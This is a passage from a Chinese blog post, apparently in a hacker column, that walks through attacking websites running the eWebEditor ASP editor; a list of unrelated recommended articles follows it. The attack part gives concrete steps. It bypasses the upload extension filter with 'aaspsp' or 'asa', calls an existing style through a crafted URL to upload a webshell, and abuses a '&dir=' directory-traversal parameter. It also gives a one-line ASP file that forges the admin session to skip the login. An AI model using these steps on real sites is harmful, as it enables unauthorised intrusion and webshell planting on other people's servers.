style="font-size:16px;">如果加了<span style="font-family:'Times New Roman';">asa</span>类型后发现还是无法上传。应该是站长懂点代码,自己修改了<span style="font-family:'Times New Roman';">Upload.asp</span>文件,但是没有关系,按照常人的思维习惯,往往直接在<span style="font-family:'Times New Roman';">sAllowExt =Replace(UCase(sAllowExt),”asp”,””)</span>一句上修改。</span></p> <p><span style="font-size:16px;">但是我们只要在上传类型中增加“<span style="font-family:'Times New Roman';">aaspsp</span>”<span style="font-family:'Times New Roman';">,</span>就可以传<span style="font-family:'Times New Roman';">asp</span>文件了,<span style="color:rgb(51,51,51);font-family:Verdana;font-size:9pt;"> </span></span></p> <p><span style="font-size:16px;">如果上述两种方法都失败了,则利用<span style="font-family:'Times New Roman';">eWebEditor</span>能够设定自动保存远程文件的类型,我们可以加入<span style="font-family:'Times New Roman';">asp</span>类型。但是如何才能让远程访问的<span style="font-family:'Times New Roman';">asp</span>文件能够以源码形式保存呢?方法是很多的,最简单的方法是将<span style="font-family:'Times New Roman';">IIS</span>中的应用文件映射中的<span style="font-family:'Times New Roman';">ASP</span>删除。</span></p> <p><span style="font-size:16px;">有的站数据库设置了只读属性,这样的站你是无法新加样式的,这样的站你可以看他数据库里的样式设置情况,一般很多时候都是让人给拿过的,而且明显的<span style="font-family:'Times New Roman';">asa</span>在那里。这样的话就可以直接构造一个调用这个样式的连接来上传<span style="font-family:'Times New Roman';">shell.</span></span></p> <p><span style="font-size:16px;">比如发现数据库里有样式<span style="font-family:'Times New Roman';">123</span>他设置的是可以上传<span style="font-family:'Times New Roman';">asa</span>的话,那么就可以这样调用:<span style="font-family:'Times New Roman';color:#333333;">http://www.***.com/eweb/ewebeditor.asp?id=contentCN&style=123</span></span></p> <p><span style="font-size:16px;">这样就可以直接上传了,然后在点编辑就会找到<span style="font-family:'Times New Roman';">shell</span>的路径了。其实这个漏洞主要是<span style="font-family:'Times New Roman';">upload.asp</span>的过滤不严造成的,新版的应该都修复了,具体爱影响的版本我也没统计过。</span></p> <p><span style="font-size:16px;">遍历路径</span></p> <p><span style="font-family:'Times New Roman';font-size:16px;">Ewebeditor</span>遍历路径漏洞,当数据库只读的时候,<span style="font-family:'Times New Roman';">ewebeditor/admin_uploadfile.asp?id=14</span>在<span style="font-family:'Times New Roman';">id=14</span>后面添加<span style="font-family:'Times New Roman';">&dir=</span>再加<span style="font-family:'Times New Roman';">&dir=/</span>或<span style="font-family:'Times New Roman';">&dir=http://www.****.com// </span>看到整个网站文件了,不过此项测试的时候发现,只有登录成功才能进行操作。</p> <p><span style="font-family:'Times New Roman';font-size:16px;">Cookie</span>漏洞</p> <p><span style="font-size:16px;">漏洞文件:<span style="font-family:'Times New Roman';">admin_private.asp</span></span></p> <p><span style="font-size:16px;">漏洞语句:</span></p> <p><span style="font-family:'Times New Roman';font-size:16px;"><% if session (“eWebEditor_User”) = “”Then</span></p> <p><span style="font-family:'Times New Roman';font-size:16px;">Response.Redirect “admin_login.asp”</span></p> <p><span style="font-family:'Times New Roman';font-size:16px;">Response.End</span></p> <p><span style="font-family:'Times New Roman';font-size:16px;">End If</span></p> <p><span style="font-size:16px;">只判断了<span style="font-family:'Times New Roman';">session,</span>没有判断<span style="font-family:'Times New Roman';">cookies</span>和路径的验证问题。</span></p> <p><span style="font-size:16px;">漏洞利用:</span></p> <p><span style="font-size:16px;">新建一个<span style="font-family:'Times New Roman';">mrchen.asp</span>内容如下:</span></p> <p><span style="font-family:'Times New Roman';font-size:16px;"><%Session (“eWebEditor_User”) =”11111111”%></span></p> <p><span style="font-size:16px;">访问<span style="font-family:'Times New Roman';">mrchen.asp</span>,再访问后台任何文件,<span style="font-family:'Times New Roman';">forexample:Admin_Default.asp</span>这个拿<span style="font-family:'Times New Roman';">shell</span>的方法就简单了。</span></p> </div> </div> </div> </div> </div> <!--PC和WAP自适应版--> <div id="SOHUCS" sid="1282927078957662208"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script> <!-- 文章页-底部 动态广告位 --> <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad"> <!-- 文章页-右侧1 动态广告位 --> <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div> <!-- 文章页-右侧2 动态广告位 --> <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div> <!-- 文章页-右侧3 动态广告位 --> <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(龙铭洪,-,网站Web,龙铭洪,-,互联网,中国黑客专栏,asp,数据库,list,function,url,javascript)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1902624998774861824.htm" title="系统架构设计(以飞控系统、航电系统、机电管理系统、电子电气架构为例)" target="_blank">系统架构设计(以飞控系统、航电系统、机电管理系统、电子电气架构为例)</a> <span class="text-muted">机载软件与适航</span> <a class="tag" taget="_blank" href="/search/%E6%9C%BA%E8%BD%BD%E7%B3%BB%E7%BB%9F/1.htm">机载系统</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E5%B7%A5%E7%A8%8B/1.htm">系统工程</a><a class="tag" taget="_blank" href="/search/%E9%80%82%E8%88%AA/1.htm">适航</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E6%9E%B6%E6%9E%84/1.htm">系统架构</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a> <div>架构的定义系统架构涉及对系统的结构和行为进行高层次的描述。它包括系统的组成部分、这些部分之间的关系、与外部环境的交互方式,以及满足特定功能和非功能性需求的方法。系统架构定义了系统的总体设计蓝图,指导系统的开发、集成、部署和维护。系统架构的核心要素组成部分(Components):系统中的独立模块或单元,每个模块执行特定的功能。组件可以是软件模块、硬件设备、数据库、用户界面等。组件间的关系(Rela</div> </li> <li><a href="/article/1902624242176946176.htm" title="Beekeeper Studio:高颜值且免费的SQL开发工具" target="_blank">Beekeeper Studio:高颜值且免费的SQL开发工具</a> <span class="text-muted">开源项目精选</span> <a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a> <div>BeekeeperStudio是一款免费开源的SQL开发和数据库管理工具,具有美观高效、简单易用的特点。BeekeeperStudio基于Vue.js开发,遵循MIT开源协议,支持Windows、Linux以及macOS平台。Stars数17842Forks数1170主要特点安全连接:除了正常的连接,也可以使用SSL加密连接或通过SSH隧道连接;SQL自动补全:代码编辑器支持语法高亮和表名自动补全</div> </li> <li><a href="/article/1902623233727852544.htm" title="PCDN如何优化移动设备的网络体验" target="_blank">PCDN如何优化移动设备的网络体验</a> <span class="text-muted">yczykjyxgs</span> <a class="tag" taget="_blank" href="/search/pcdn/1.htm">pcdn</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a> <div>在移动互联网时代,用户对网络体验的要求不断提升,PCDN(P2PCDN)技术为优化移动设备网络体验提供了创新解决方案。这项技术通过重构传统内容分发模式,有效解决了移动网络环境下的带宽瓶颈和传输延迟问题。PCDN技术的核心在于构建了一个去中心化的内容分发网络。移动设备不再仅仅作为内容消费者,而是同时承担了内容分发节点的角色。这种设计充分利用了移动设备的闲置带宽和存储资源,形成了一个动态的内容共享网络</div> </li> <li><a href="/article/1902623234407329792.htm" title="## PCDN中的网络拥塞控制技术探讨" target="_blank">## PCDN中的网络拥塞控制技术探讨</a> <span class="text-muted">yczykjyxgs</span> <a class="tag" taget="_blank" href="/search/pcdn/1.htm">pcdn</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E6%99%BA%E8%83%BD%E8%B7%AF%E7%94%B1%E5%99%A8/1.htm">智能路由器</a> <div>随着互联网视频流量的爆发式增长,传统CDN面临着成本高、扩展性差等挑战。P2PCDN(PCDN)作为一种新兴的内容分发网络架构,通过利用边缘节点的闲置带宽和存储资源,有效降低了内容分发成本,并提升了网络扩展性。然而,PCDN中节点动态性强、网络环境复杂,传统的网络拥塞控制技术难以直接适用,因此需要针对PCDN的特点设计新的拥塞控制机制。PCDN网络拥塞控制面临的挑战1.节点异构性:PCDN节点性能</div> </li> <li><a href="/article/1902623107391221760.htm" title="PCDN 与传统 CDN 的对比:优势和劣势分析" target="_blank">PCDN 与传统 CDN 的对比:优势和劣势分析</a> <span class="text-muted">yczykjyxgs</span> <a class="tag" taget="_blank" href="/search/pcdn/1.htm">pcdn</a><a class="tag" taget="_blank" href="/search/%E6%99%BA%E8%83%BD%E8%B7%AF%E7%94%B1%E5%99%A8/1.htm">智能路由器</a> <div>在内容分发领域,PCDN和传统CDN是两种重要的技术手段。传统CDN凭借其成熟的架构,在互联网发展历程中发挥着关键作用。它通过在各地广泛部署缓存服务器,将内容缓存至离用户更近的节点,以此加快分发速度。这种模式下,内容传输路径短,能有效减少延迟,为用户提供稳定的访问体验。不过,传统CDN的大规模服务器部署带来了高昂成本,无论是建设费用还是维护成本都不容小觑。PCDN作为融合了P2P技术的新兴内容分发</div> </li> <li><a href="/article/1902621717168189440.htm" title="区块链赋能:用Python开发去中心化投票系统" target="_blank">区块链赋能:用Python开发去中心化投票系统</a> <span class="text-muted">Echo_Wish</span> <a class="tag" taget="_blank" href="/search/Python%EF%BC%81/1.htm">Python!</a><a class="tag" taget="_blank" href="/search/%E5%AE%9E%E6%88%98%EF%BC%81/1.htm">实战!</a><a class="tag" taget="_blank" href="/search/%E5%8C%BA%E5%9D%97%E9%93%BE/1.htm">区块链</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%8E%BB%E4%B8%AD%E5%BF%83%E5%8C%96/1.htm">去中心化</a> <div>区块链赋能:用Python开发去中心化投票系统在这个互联网迅猛发展的时代,投票系统不仅仅停留在政务领域,它已成为社区治理、企业决策甚至区块链DAO(去中心化自治组织)中重要的机制。然而,传统投票系统往往集中化,存在信任和数据安全问题。区块链技术以其不可篡改性和透明性为去中心化投票提供了理想的解决方案。在这篇文章中,我将通过Python语言,结合区块链智能合约,教你如何从零开发一个去中心化的投票系统</div> </li> <li><a href="/article/1902621213402918912.htm" title="Peach-Editor,一款Web版电子病例编辑器实验版本上线了" target="_blank">Peach-Editor,一款Web版电子病例编辑器实验版本上线了</a> <span class="text-muted">大神1573</span> <a class="tag" taget="_blank" href="/search/Peach-Editor/1.htm">Peach-Editor</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E8%BE%91%E5%99%A8/1.htm">编辑器</a> <div>经过一年多的辛苦钻研,一款web版本的电子病例编辑器基础word编辑功能版本终于和大家见面了,编辑器实现了参照传统文档编辑习惯,尽可能的还原原汁原味的文档编辑体验。目前初步完成了基础的文本编辑、表格、分页、页面控制等后续还加加入电子病例相关内容,整个编辑器的研发进度正在有序推进中,现将阶段性成果展示给大家。整体界面,沿用了传统的文档编辑习惯,菜单栏分为文件、编辑、插入、页面、审阅。编辑菜单内容主要</div> </li> <li><a href="/article/1902617936506449920.htm" title="某智慧医养服务平台Uploads存在任意文件上传漏洞(DVB-2025-8968)" target="_blank">某智慧医养服务平台Uploads存在任意文件上传漏洞(DVB-2025-8968)</a> <span class="text-muted">Byp0ss403</span> <a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E9%9B%86%E5%90%88/1.htm">漏洞复现集合</a><a class="tag" taget="_blank" href="/search/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.htm">文件上传</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>免责声明本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品介绍广西金中软件集团有限公司前身成立于1999年,隶属于广西电信下的三产公司金中信息产业有限公司,是一家集软件开发、网站建设、网络工程、系统</div> </li> <li><a href="/article/1902617177618444288.htm" title="怎么看股指期货多空单数量?" target="_blank">怎么看股指期货多空单数量?</a> <span class="text-muted">财财有个期权懂</span> <a class="tag" taget="_blank" href="/search/%E9%87%91%E8%9E%8D/1.htm">金融</a><a class="tag" taget="_blank" href="/search/%E8%B4%A2%E7%BB%8F/1.htm">财经</a> <div>查看期货多空持仓量是投资者判断市场走势、制定投资策略的重要依据。股指期货多空单数据股指期货的多空单数据是可以查询到的,老板们可以通过自己使用的期货公司交易软件,或者是交易所官网,或者金融网站都可以可能到的。首先是期货公司的交易软件,一般来说交易软件上面都会有多空单的信息,老板们只需要登录软件,进入股指期货的页面,然后选择要看的合约,接着选择多空持仓选项就可以看到股指期货的多空持仓情况。其次就是交易</div> </li> <li><a href="/article/1902616672716517376.htm" title="Web自动化测试(一)" target="_blank">Web自动化测试(一)</a> <span class="text-muted">树的鲨鱼</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E5%8C%96/1.htm">自动化</a><a class="tag" taget="_blank" href="/search/%E5%8A%9F%E8%83%BD%E6%B5%8B%E8%AF%95/1.htm">功能测试</a> <div>提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档Web自动化测试(一)前言一、自动化相关理论1.什么是自动化以及它的好处2.什么是软件测试3.什么是自动化测试4.自动化测试能解决什么问题4.自动化测试分类5.什么Web项目适合做自动化测试6.Web自动化测试所属分类7.主流的Web自动化测试化工具二、Selenium1.特点2.发展历程3.环境搭建4.第一个案例三、Selenium</div> </li> <li><a href="/article/1902615789479981056.htm" title="【从零开始学习计算机科学】信息安全(十三)区块链" target="_blank">【从零开始学习计算机科学】信息安全(十三)区块链</a> <span class="text-muted">贫苦游商</span> <a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%8C%BA%E5%9D%97%E9%93%BE/1.htm">区块链</a><a class="tag" taget="_blank" href="/search/hash/1.htm">hash</a><a class="tag" taget="_blank" href="/search/%E5%85%AC%E6%9C%89%E9%93%BE/1.htm">公有链</a><a class="tag" taget="_blank" href="/search/%E7%A7%81%E6%9C%89%E9%93%BE/1.htm">私有链</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>【从零开始学习计算机科学】信息安全(十三)区块链区块链区块链概述区块链的主要特性开放,共识交易透明,双方匿名不可篡改,可追溯区块链的主要类别公有链私有链联盟链区块链核心技术Hash指针Merkle(梅根)树SPV交易验证过程区块链网络分叉解决机制51%攻击问题基于比特币的区块链的优势与不足常用的区块链区块链区块链概述能否在互联网环境(开放环境)下,创造一种技术,使得在无法保证人们相互信任的前提下,</div> </li> <li><a href="/article/1902613138394640384.htm" title="个人AI助手的未来:Yi AI开源系统助力快速搭建" target="_blank">个人AI助手的未来:Yi AI开源系统助力快速搭建</a> <span class="text-muted">耶耶Norsea</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%9D%82%E7%83%A9/1.htm">网络杂烩</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90/1.htm">开源</a> <div>摘要YiAI推出了一站式个人AI助手平台解决方案,助力用户快速搭建专属AI助手。该平台采用全套开源系统,涵盖前端应用、后台管理及小程序功能,并基于MIT协议开放使用。同时,平台集成了本地RAG方案,利用Milvus与Weaviate向量数据库支持本地部署,为用户提供高效、灵活的数据处理能力。关键词个人AI助手,快速搭建,开源系统,本地RAG,向量数据库一、YiAI开源系统概述1.1个人AI助手的发</div> </li> <li><a href="/article/1902610360431603712.htm" title="HTML:ul标签的作用" target="_blank">HTML:ul标签的作用</a> <span class="text-muted">凭君语未可</span> <a class="tag" taget="_blank" href="/search/Web%E5%BC%80%E5%8F%91/1.htm">Web开发</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>ul标签解释解释举例效果分析``标签支持的属性1.`type`举例:效果:分析2.`class`举例:效果:分析解释在HTML中,标签表示无序列表(UnorderedList)。它用于创建一个项目列表,其中列表项通常以圆形、方形或none的图标(也称为列表项标记)进行标记。每个列表项都是使用(listitem)标签创建的。举例123效果分析在上面的例子中,我们创建了一个包含三个项目的无序列表,这些</div> </li> <li><a href="/article/1902609476582699008.htm" title="Web3身份验证技术对数据保护的影响研究" target="_blank">Web3身份验证技术对数据保护的影响研究</a> <span class="text-muted">清 晨</span> <a class="tag" taget="_blank" href="/search/%E5%8F%8D%E4%BE%A6%E6%B5%8B%E6%8C%87%E7%BA%B9%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">反侦测指纹浏览器</a><a class="tag" taget="_blank" href="/search/%E7%A4%BE%E4%BA%A4%E5%AA%92%E4%BD%93/1.htm">社交媒体</a><a class="tag" taget="_blank" href="/search/web3/1.htm">web3</a><a class="tag" taget="_blank" href="/search/ClonBrowser/1.htm">ClonBrowser</a><a class="tag" taget="_blank" href="/search/%E8%B7%A8%E5%A2%83%E7%94%B5%E5%95%86/1.htm">跨境电商</a><a class="tag" taget="_blank" href="/search/%E9%9A%90%E7%A7%81%E4%BF%9D%E6%8A%A4/1.htm">隐私保护</a> <div>Web3身份验证技术对数据保护的影响研究在这个数字化时代,我们的身份和数据安全比以往任何时候都更加重要。Web3技术以其去中心化和用户主权的核心理念,为个人数据的管理和保护提供了新的视角。本文将探讨Web3身份验证技术如何影响数据保护,并分析其对我们数字生活的影响。Web3身份验证技术简介Web3身份验证技术依托于区块链和先进的加密技术,如非对称加密算法和智能合约,为用户提供了一种全新的身份验证方</div> </li> <li><a href="/article/1902607391434797056.htm" title="Moodle + Websoft9:创新教育的强大组合,助力教学与学习" target="_blank">Moodle + Websoft9:创新教育的强大组合,助力教学与学习</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90%E8%BD%AF%E4%BB%B6/1.htm">开源软件</a> <div>Moodle+Websoft9:构建未来课堂的技术基石一、Moodle:开源生态的深度解析•模块化设计:支持超800个官方插件,如H5P交互内容创作、BigBlueButton虚拟课堂,满足个性化教学需求。•学习分析引擎:内置LearningAnalyticsAPI,可集成Python/R语言进行深度学习,预测学生学业风险。•移动优先战略:MoodleApp支持离线学习、扫码签到,2023年新增A</div> </li> <li><a href="/article/1902606705489932288.htm" title="python-flask复习(一)" target="_blank">python-flask复习(一)</a> <span class="text-muted">胖虎是只mao</span> <a class="tag" taget="_blank" href="/search/python-web/1.htm">python-web</a><a class="tag" taget="_blank" href="/search/python%E5%87%BD%E6%95%B0/1.htm">python函数</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/flask/1.htm">flask</a> <div>一、Python现阶段三大主流Web框架Django、Tornado、Flask对比Django主要特点是大而全,集成了很多组件(例如Models、Admin、Form等等),不管你用得到用不到,反正它全都有,属于全能型框架,通常用于大型Web应用,由于内置组件足够强大所以使用Django开发可以一气呵成,优点是大而全,缺点也就暴露出来了,这么多的资源一次性全部加载,肯定会造成一部分的资源浪费;T</div> </li> <li><a href="/article/1902606325221748736.htm" title="Optional源码解析和示例解析" target="_blank">Optional源码解析和示例解析</a> <span class="text-muted">飞翔中文网</span> <a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/jdk/1.htm">jdk</a> <div>Optional源码解析packagejava.util;importjava.util.function.Consumer;importjava.util.function.Function;importjava.util.function.Predicate;importjava.util.function.Supplier;/***这是一个容器对象,它可能包含一个非空值,也可能不包含。*如果</div> </li> <li><a href="/article/1902606000662310912.htm" title="互联网运营为何必须做好用户行为数据分析" target="_blank">互联网运营为何必须做好用户行为数据分析</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90%E8%BD%AF%E4%BB%B6%E5%9F%8B%E7%82%B9%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90/1.htm">开源软件埋点数据分析</a> <div>近年来互联网运营已经成为大多数企业不可或缺的一部分。随着互联网技术的不断发展和数字化转型的推进,越来越多的企业都在加速向互联网运营转型,而在这一过程当中,分析用户行为数据是至关重要的。接下来,我们就来探讨一下其中的原因。一、什么是用户行为数据?用户行为数据指的是在用户与产品、服务或平台交互过程中产生的各种数据。举个例子:某app中,某个用户在某个时间点在某个地方以某种方式完成了某个具体的操作。实际</div> </li> <li><a href="/article/1902605490790133760.htm" title="向量数据库 PieCloudVector 进阶系列丨打造以 LLM 为基础的聊天机器人" target="_blank">向量数据库 PieCloudVector 进阶系列丨打造以 LLM 为基础的聊天机器人</a> <span class="text-muted"></span> <div>本系列前两篇文章深入探讨了PieCloudVector在图片和音频数据上的应用之后,本文将聚焦于文本数据,探索PieCloudVector对于文本数据的向量化处理、存储以及检索,并最终结合LLM打造聊天机器人的全流程。在自然语言处理任务中涉及到大量对文本数据的处理、分析和理解,而向量数据库在其中发挥了重要的作用。本文为《PieCloudVector进阶系列》的第三篇,将为大家介绍如何利用PieCl</div> </li> <li><a href="/article/1902601032496640000.htm" title="加密算法的性能优化与安全性平衡研究" target="_blank">加密算法的性能优化与安全性平衡研究</a> <span class="text-muted">sigen520520</span> <a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a> <div>摘要在数字化信息飞速发展的当下,数据安全至关重要,加密算法作为数据保护的核心手段,其性能与安全性直接关乎信息系统的稳定运行。本文深入剖析常见加密算法,详细分析其性能指标与安全性特点,全面探讨在提升加密速度的同时确保安全的有效方法与实践,旨在为构建高效、安全的加密体系提供理论支撑与实践指导。引言随着互联网的普及和信息技术的广泛应用,数据在传输与存储过程中面临诸多安全威胁,如数据泄露、篡改、伪造等。加</div> </li> <li><a href="/article/1902600150681972736.htm" title="✨❤️CSDN标题党❤️,创意无极限,那不直接全网站都花的飞起?" target="_blank">✨❤️CSDN标题党❤️,创意无极限,那不直接全网站都花的飞起?</a> <span class="text-muted">少年,又是你</span> <a class="tag" taget="_blank" href="/search/icons/1.htm">icons</a><a class="tag" taget="_blank" href="/search/ui%E8%AE%BE%E8%AE%A1/1.htm">ui设计</a><a class="tag" taget="_blank" href="/search/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E/1.htm">搜索引擎</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E6%95%B0%E6%8D%AE/1.htm">大数据</a><a class="tag" taget="_blank" href="/search/%E7%99%BE%E5%BA%A6/1.htm">百度</a> <div>这只是一张图。❤️CSDN标题党❤️想法由来如何化为己用总结想法由来那这个想法之初呢,是因为我看到好多博主的标题啊,文章中都存在一些精美的小图片,那我身为一个男生看这些都有些心动啊,实在是精美。那的确为了流量,大家也都是攒足了劲。那我就在想,这些是什么呢?我一搜发现,原来是表情符号。那我不知道你们的电脑是怎么样的,我反正只要按了windows键+句号(.)即可在任何应用程序中使用表情符号。好使的不</div> </li> <li><a href="/article/1902599895328550912.htm" title="【使用 Element UI 实现手动上传文件:FormData 追加文件和其他参数,支持单文件覆盖上传】" target="_blank">【使用 Element UI 实现手动上传文件:FormData 追加文件和其他参数,支持单文件覆盖上传】</a> <span class="text-muted">Hermione_log</span> <a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a><a class="tag" taget="_blank" href="/search/elementui/1.htm">elementui</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>在开发Web应用时,文件上传是一个常见的需求。ElementUI提供了强大的el-upload组件,可以轻松实现文件上传功能。本文将详细介绍如何使用ElementUI实现以下功能:手动触发文件上传:用户选择文件后,点击按钮手动上传。使用FormData追加文件和其他参数:将文件和其他表单数据一起提交。单文件覆盖上传:只允许上传一个文件,新文件会覆盖旧文件。1.实现思路为了实现上述功能,我们需要以下</div> </li> <li><a href="/article/1902599566889381888.htm" title="基于 Websoft9 平台的 Odoo 教学实践:助力智能制造、物流与财务会计专业教师提升教学效果" target="_blank">基于 Websoft9 平台的 Odoo 教学实践:助力智能制造、物流与财务会计专业教师提升教学效果</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90/1.htm">开源</a> <div>Websoft9作为企业级开源软件的自动化部署与管理平台,为高校智能制造、物流与财务会计等专业提供了完整的Odoo(开源ERP)教学解决方案。以下从部署、维护及功能扩展三方面解析其核心价值:一、部署:开箱即用的企业级业务场景模拟一键构建复杂业务架构Websoft9预置了Odoo全模块集成模板,部署时可自动关联PostgreSQL数据库、Nginx负载均衡及Let'sEncryptSSL证书,还原真</div> </li> <li><a href="/article/1902599516868112384.htm" title="2025React岗位前端面试题180道及其答案解析,看完稳了,万字长文,持续更新...." target="_blank">2025React岗位前端面试题180道及其答案解析,看完稳了,万字长文,持续更新....</a> <span class="text-muted">祈澈菇凉</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>1.什么是React?它的主要特点是什么?答案解析:React是一个用于构建用户界面的JavaScript库,主要用于构建单页应用。其主要特点包括:组件化:React应用由多个可重用的组件组成,便于管理和维护。虚拟DOM:React使用虚拟DOM提高性能,通过最小化实际DOM操作来优化渲染过程。单向数据流:数据在组件之间以单向流动的方式传递,简化了数据管理和调试。声明式编程:React允许开发者以</div> </li> <li><a href="/article/1902598935088787456.htm" title="从 DeepSeek 到 AI 工具箱:Websoft9 应用托管平台赋能高校教学与科研" target="_blank">从 DeepSeek 到 AI 工具箱:Websoft9 应用托管平台赋能高校教学与科研</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BDdeepseek/1.htm">人工智能deepseek</a> <div>从DeepSeek到AI工具箱:Websoft9应用托管平台赋能高校教学与科研人工智能技术的快速发展正在重塑高校的教学与科研生态。从智能教学辅助到跨学科研究,AI工具的应用场景不断扩展,而技术落地的复杂性也带来新的挑战。在这一背景下,如何将大模型能力与多样化AI工具无缝整合,构建安全、易用的科研教学环境,成为高校数字化转型的关键命题。一、高校智能化转型的三大痛点技术门槛高•AI工具部署依赖专业运维</div> </li> <li><a href="/article/1902598556313776128.htm" title="Websoft9 开源多应用平台:培养学生数字化能力的实战工具" target="_blank">Websoft9 开源多应用平台:培养学生数字化能力的实战工具</a> <span class="text-muted"></span> <a class="tag" taget="_blank" href="/search/%E5%BC%80%E6%BA%90%E5%AE%9E%E8%B7%B5/1.htm">开源实践</a> <div>引言数字化教育转型的核心在于将技术工具与教学场景深度融合,但传统模式常因环境配置复杂、工具链割裂等问题阻碍实践教学效率。Websoft9开源多应用平台以标准化部署、多工具集成、轻量化运维为核心能力,为教育场景提供了一种技术门槛更低、协作效率更高的解决方案。本文基于实际教学需求与技术验证,探讨如何通过该平台构建数字化能力培养体系。一、技术特性与教育场景的适配性开源生态覆盖全技术栈,缩短教学准备周期平</div> </li> <li><a href="/article/1902597625216036864.htm" title="RAMS数据处理程序—垂直剖面分析程序" target="_blank">RAMS数据处理程序—垂直剖面分析程序</a> <span class="text-muted">Hardess-god</span> <a class="tag" taget="_blank" href="/search/RAMS/1.htm">RAMS</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a> <div>该程序的主要特点:使用Cartopy创建地图投影添加海岸线、国界线等地理要素绘制等值线图显示气象要素分布自动设置颜色标尺和标题支持不同层次的数据展示importmatplotlib.pyplotaspltdefplot_vertical_cross_section(data,start_lat,start_lon,end_lat,end_lon):"""绘制垂直剖面图"""#计算剖面线上的点num</div> </li> <li><a href="/article/1902596992740159488.htm" title="获取网站流量的方法有哪些?" target="_blank">获取网站流量的方法有哪些?</a> <span class="text-muted">liuliangpuzi</span> <a class="tag" taget="_blank" href="/search/%E4%BA%92%E8%81%94%E7%BD%91%E6%B5%81%E9%87%8F%E8%BF%90%E8%90%A5%E6%95%B0%E6%8D%AE/1.htm">互联网流量运营数据</a><a class="tag" taget="_blank" href="/search/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E/1.htm">搜索引擎</a><a class="tag" taget="_blank" href="/search/%E7%99%BE%E5%BA%A6/1.htm">百度</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E6%95%B0%E6%8D%AE/1.htm">大数据</a> 